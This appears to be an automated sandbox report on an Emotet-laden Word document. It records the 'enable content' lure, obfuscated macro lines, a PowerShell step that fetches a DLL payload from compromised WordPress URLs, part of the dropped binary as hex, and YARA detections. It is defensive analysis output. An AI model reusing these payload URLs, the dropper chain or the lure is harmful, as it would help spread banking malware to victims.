                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: https://somanap.com/wp-admin/P/
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Wed, 06 Jan 2021 07:53:49 GMTLast-Modified: Wed, 06 Jan 2021 07:53:49 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5ff56c8d1a339=1609919629; expires=Wed, 06-Jan-2021 07:54:49 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="bLH.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 06 Jan 2021 07:53:48 GMTContent-Length: 192000Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                      Source: global trafficHTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 176.53.69.151 176.53.69.151
                      Source: Joe Sandbox ViewASN Name: RADORETR RADORETR
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD43F3-025D-4403-9DBE-B492A11253DC}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: petafilm.com
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmpString found in binary or memory: http://petafilm.com
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: http://petafilm.com/wp-admin/4m/
                      Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
                      Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000008.00000002.2097194758.0000000001D20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: https://fnjbq.com/wp-includes/rlR/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in binary or memory: https://somanap.com/wp-admin/P/

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Word
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Words:3 N@m 13 ;a 10096 G
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                      Document contains an embedded VBA with base64 encoded stringsShow sources
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
                      Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5293
                      Source: unknownProcess created: Commandline size = 5197
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5197
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vpdqbmffwwlyu\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00262C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00273895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002702C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002742DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00268736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00267B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00274B41
